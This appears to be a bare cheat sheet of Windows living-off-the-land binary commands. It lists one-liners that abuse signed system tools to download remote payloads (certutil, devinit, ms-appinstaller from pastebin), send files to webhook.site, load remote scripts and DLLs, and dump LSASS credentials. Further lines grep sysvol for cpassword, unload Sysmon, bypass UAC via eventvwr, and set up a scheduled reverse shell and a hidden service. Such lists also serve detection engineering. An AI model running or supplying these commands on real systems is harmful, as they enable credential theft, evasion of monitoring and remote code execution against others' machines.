Apps and Commands

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:.

start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u

C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe

ATBroker.exe /start malware

bash.exe -c calc.exe

bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1

certoc.exe -LoadDLL "C:\test\calc.dll"

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName

type \\webdav-server\folder\file.ext > C:\Path\file.ext
type C:\Path\file.ext > \\webdav-server\folder\file.ext

cmdkey /list

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

colorcpl file.txt

ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
ConfigSecurityPolicy.exe https://example.com/payload

conhost.exe calc.exe

csc.exe -out:My.exe File.cs
csc -target:library File.cs

DeviceCredentialDeployment

diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe

ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe

findstr /S /I cpassword \\sysvol\policies\*.xml

fltMC.exe unload SysmonDrv

echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt

msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE

psr.exe /start /output D:\test.zip /sc 1 /gui 0

Pester.bat [/help|?|-?|/?] "$null; notepad"

pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct

devtunnel.exe host -p 8080

wsl.exe -e /mnt/c/Windows/System32/calc.exe

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"

Tracker.exe /d .\calc.dll /c C:\Windows\write.exe

squirrel.exe --download [url to package]
squirrel.exe --update [url to package]
squirrel.exe --updateRollback=[url to package]

SQLToolsPS.exe -noprofile -command Start-Process calc.exe

sqldumper.exe 464 0 0x0110

Remote.exe /s "powershell.exe" anythinghere

ProtocolHandler.exe https://example.com/payload

OpenConsole.exe calc

mspub.exe https://example.com/payload

msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"

Mftrace.exe cmd.exe

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full

dump64.exe <pid> out.dmp

dotnet.exe [PATH_TO_DLL]

devinit.exe run -t msi-install -i https://example.com/out.msi

csi.exe file

createdump.exe -n -f dump.dmp [PID]

rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full

rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"

rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"

code.exe tunnel --accept-server-license-terms --name "tunnel-name"

wsreset.exe

wmic.exe process call create "c:\ads\file.txt:program.exe"

rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"

ssh localhost calc.exe

sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice

rundll32.exe AllTheThingsx64,EntryPoint